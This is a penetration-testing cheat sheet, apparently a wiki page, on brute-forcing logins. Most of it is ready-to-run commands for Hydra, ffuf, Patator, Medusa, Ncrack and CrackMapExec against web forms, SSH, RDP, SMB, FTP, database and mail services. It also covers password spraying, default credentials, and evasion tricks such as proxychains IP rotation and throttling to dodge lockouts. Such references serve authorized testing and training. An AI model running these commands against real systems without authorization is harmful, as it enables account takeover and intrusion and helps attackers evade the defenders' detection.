Bruteforcing

Authentication bruteforcing attacks to guess credentials or bypass login mechanisms.

Skill Level: Beginner to Intermediate Prerequisites: Basic HTTP understanding, wordlist selection

Password Identification

# Identify hash type
hash-identifier

# Name That Hash (better)
# https://github.com/HashPals/Name-That-Hash
nth --text "5f4dcc3b5aa765d61d8327deb882cf99"

# hashid
hashid -m '$2a$10$...'  # Shows hashcat mode

Wordlist Generation

# CeWL - Generate wordlist from target website
cewl https://target.com -d 3 -m 5 -w custom_wordlist.txt
cewl https://target.com --with-numbers -d 3 -w wordlist.txt

# Generate password variations
# https://github.com/edoardottt/longtongue
python3 longtongue.py -w base_words.txt -o passwords.txt

# Username wordlist from names
# https://github.com/AhmedMohamedDev/namemash.py
python namemash.py names.txt > usernames.txt

HTTP Bruteforcing

Hydra

# HTTP GET Form
hydra -L users.txt -P passwords.txt target.com http-get-form \
  "/login:username=^USER^&password=^PASS^:F=Invalid credentials"

# HTTP POST Form
hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form \
  "/login:user=^USER^&pass=^PASS^:F=Login failed" -V

# HTTPS POST Form
hydra -l admin -P passwords.txt target.com -s 443 -S https-post-form \
  "/login:username=^USER^&password=^PASS^:F=Incorrect"

# Basic Auth
hydra -L users.txt -P passwords.txt target.com http-get /admin

# With cookies
hydra -l admin -P passwords.txt target.com http-post-form \
  "/login:user=^USER^&pass=^PASS^:F=failed:H=Cookie: session=abc123"

ffuf

# POST login form
ffuf -w users.txt:USER -w passwords.txt:PASS \
  -u https://target.com/login \
  -X POST -d "username=USER&password=PASS" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -fc 401 -mc 200,302

# With rate limiting
ffuf -w passwords.txt -u https://target.com/login \
  -X POST -d "user=admin&pass=FUZZ" \
  -rate 10 -fc 401

Patator

# HTTP POST
patator http_fuzz url=https://target.com/login method=POST \
  body='{"user":"admin","password":"FILE0"}' \
  0=/path/to/passwords.txt \
  accept_cookie=1 follow=1 \
  -x ignore:fgrep='Invalid'

# HTTP Basic Auth
patator http_fuzz url=https://target.com/admin \
  user_pass=FILE0:FILE1 \
  0=users.txt 1=passwords.txt \
  -x ignore:code=401

Service Bruteforcing

SSH

hydra -l root -P passwords.txt ssh://target.com
hydra -L users.txt -P passwords.txt target.com ssh -t 4

# Medusa
medusa -h target.com -u root -P passwords.txt -M ssh

# Ncrack
ncrack -p 22 --user root -P passwords.txt target.com

RDP

hydra -l administrator -P passwords.txt rdp://target.com
ncrack -p 3389 --user administrator -P passwords.txt target.com

# Crowbar (RDP specific)
crowbar -b rdp -s target.com/32 -u admin -C passwords.txt -n 1

FTP

hydra -L users.txt -P passwords.txt ftp://target.com
hydra -l anonymous -P passwords.txt target.com ftp

SMB

hydra -L users.txt -P passwords.txt smb://target.com
crackmapexec smb target.com -u users.txt -p passwords.txt

Database Services

# MySQL
hydra -l root -P passwords.txt mysql://target.com

# PostgreSQL
hydra -l postgres -P passwords.txt postgres://target.com

# MSSQL
hydra -l sa -P passwords.txt mssql://target.com

# MongoDB
nmap -p 27017 --script mongodb-brute target.com

Other Services

# SNMP
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp

# SMTP
hydra -l [email protected] -P passwords.txt smtp://target.com

# POP3
hydra -l user -P passwords.txt pop3://target.com

# IMAP
hydra -l user -P passwords.txt imap://target.com

Evasion Techniques

# Slow down requests
hydra -l admin -P passwords.txt target.com http-post-form "/login:..." -t 1 -w 3

# Random User-Agent
hydra ... -e nsr  # Try null, same as login, reversed

# IP rotation (via proxychains)
proxychains hydra -l admin -P passwords.txt target.com http-post-form "/login:..."

# Add delays between requests
ffuf -w passwords.txt -u https://target.com/login -p 0.5-1.0

Password Spraying

# Single password against many users
# https://github.com/x90skysn3k/brutespray
python brutespray.py --file nmap.gnmap -U users.txt -p 'Summer2024!' --threads 5

# CrackMapExec for AD
crackmapexec smb dc.target.com -u users.txt -p 'Password123!' --continue-on-success

# Spray single password
hydra -L users.txt -p 'Welcome1!' target.com http-post-form "/login:..."

Default Credentials

# Check common default credentials
# https://github.com/ihebski/DefaultCreds-cheat-sheet
# https://many-passwords.github.io/

# Common defaults to try:
admin:admin
admin:password
root:root
test:test
guest:guest

Wordlists

# Passwords
/usr/share/wordlists/rockyou.txt
/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt
/usr/share/seclists/Passwords/darkweb2017-top10000.txt

# Usernames
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
/usr/share/seclists/Usernames/Names/names.txt

Password Cracking - Hash cracking
Wordlist Reference - Wordlist selection guide

PreviousHeader injections NextOnline hashes cracked

Last updated 8 days ago

Was this helpful?

hashtagPassword Identification

hashtagWordlist Generation

hashtagHTTP Bruteforcing

hashtagHydra

hashtagffuf

hashtagPatator

hashtagService Bruteforcing

hashtagSSH

hashtagRDP

hashtagFTP

hashtagSMB

hashtagDatabase Services

hashtagOther Services

hashtagEvasion Techniques

hashtagPassword Spraying

hashtagDefault Credentials

hashtagWordlists

hashtagRelated Topics

Password Identification

Wordlist Generation

HTTP Bruteforcing

Hydra

ffuf

Patator

Service Bruteforcing

SSH

RDP

FTP

SMB

Database Services

Other Services

Evasion Techniques

Password Spraying

Default Credentials

Wordlists

Related Topics